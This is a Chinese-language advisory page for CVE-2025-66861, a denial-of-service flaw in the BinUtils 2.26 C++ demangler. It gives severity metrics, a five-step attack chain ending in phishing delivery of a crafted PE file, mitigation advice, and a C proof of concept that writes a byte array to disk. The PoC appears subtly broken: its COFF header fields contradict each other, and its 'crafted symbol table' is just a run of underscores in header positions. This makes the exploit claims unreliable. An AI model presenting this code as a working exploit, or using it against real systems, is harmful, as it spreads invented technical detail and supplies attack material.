CVE-2025-66861: BinUtils cp-demangle.c d_unqualified

漏洞信息

漏洞编号

CVE-2025-66861

漏洞类型

拒绝服务

CVSS评分

2.5 低危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

BinUtils 2.26

漏洞概述

CVE-2025-66861是BinUtils 2.26版本中的一个拒绝服务漏洞。该漏洞位于cp-demangle.c文件中的d_unqualified_name函数，攻击者可以通过精心构造的PE（可移植可执行）文件触发该漏洞。当BinUtils处理恶意PE文件时，cp-demangle组件在解析符号名称时存在缺陷，可能导致程序崩溃或服务中断。由于该漏洞的CVSS评分为2.5（低危），且攻击复杂度较高、需要用户交互，因此实际危害相对有限。然而，在处理不受信任的PE文件时仍需谨慎，建议相关用户及时更新至最新版本以修复此问题。BinUtils作为GNU项目的重要组成部分，广泛应用于各种编译、调试和逆向工程工具中，其安全性对整个开发生态系统具有重要影响。

技术细节

该漏洞存在于BinUtils 2.26的cp-demangle.c源文件中，具体位于d_unqualified_name函数。cp-demangle是BinUtils中用于C++名称修饰（demangling）的组件，负责将编译后的C++符号名称还原为可读格式。在处理PE文件时，该组件需要解析文件中的符号信息。当d_unqualified_name函数在解析精心构造的PE文件时，由于缺乏适当的边界检查和错误处理，攻击者可以通过构造包含畸形数据的PE文件触发该函数的异常行为，导致程序执行流程异常或内存访问错误，最终引发拒绝服务状态。攻击者需要诱使目标用户使用BinUtils工具（如c++filt、objdump等）处理恶意PE文件才能利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者创建包含畸形符号表的恶意PE文件，精心构造触发d_unqualified_name函数异常的数据

STEP 2

步骤2

攻击者将恶意PE文件通过社交工程、钓鱼邮件或其他方式传递给目标用户

STEP 3

步骤3

目标用户使用BinUtils工具（如objdump、nm、c++filt等）处理该恶意PE文件

STEP 4

步骤4

BinUtils的cp-demangle组件在解析PE文件符号时，d_unqualified_name函数触发异常

STEP 5

步骤5

程序崩溃或进入拒绝服务状态，导致BinUtils工具无法正常工作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-66861 PoC - BinUtils cp-demangle.c DoS
 * Target: BinUtils 2.26 (cp-demangle.c d_unqualified_name)
 * Description: Crafted PE file triggers DoS in d_unqualified_name function
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Minimal PE header structure
unsigned char crafted_pe[] = {
    // DOS Header
    0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
    0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
    // PE Header offset
    0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD,
    0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
    0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72,
    0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
    0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E,
    0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
    0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A,
    0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    // PE Signature
    0x50, 0x45, 0x00, 0x00,
    // COFF Header (Machine: i386)
    0x4C, 0x01, 0x03, 0x00,
    // NumberOfSections: 1
    0x01, 0x00, 0x00, 0x00,
    // Crafted symbol table causing d_unqualified_name overflow
    0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F,
    0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F, 0x5F,
    0x00, 0x00, 0x00, 0x00
};

int main() {
    FILE *fp = fopen("cve_2025_66861_crafted.pe", "wb");
    if (fp) {
        fwrite(crafted_pe, 1, sizeof(crafted_pe), fp);
        fclose(fp);
        printf("PoC PE file created: cve_2025_66861_crafted.pe\n");
        printf("Use BinUtils tools (objdump, c++filt) to process this file\n");
    }
    return 0;
}

影响范围

BinUtils 2.26

防御指南

临时缓解措施

在BinUtils官方发布修复版本之前，建议不要打开或处理来源不明的PE文件。对于必须处理的外部PE文件，建议在隔离环境（如沙箱或虚拟机）中进行操作，并确保BinUtils工具在处理失败时不会影响其他系统功能。同时，可以考虑使用文件完整性检查工具验证PE文件的合法性。

CVE-2025-66861: BinUtils cp-demangle.c d_unqualified_name函数拒绝服务漏洞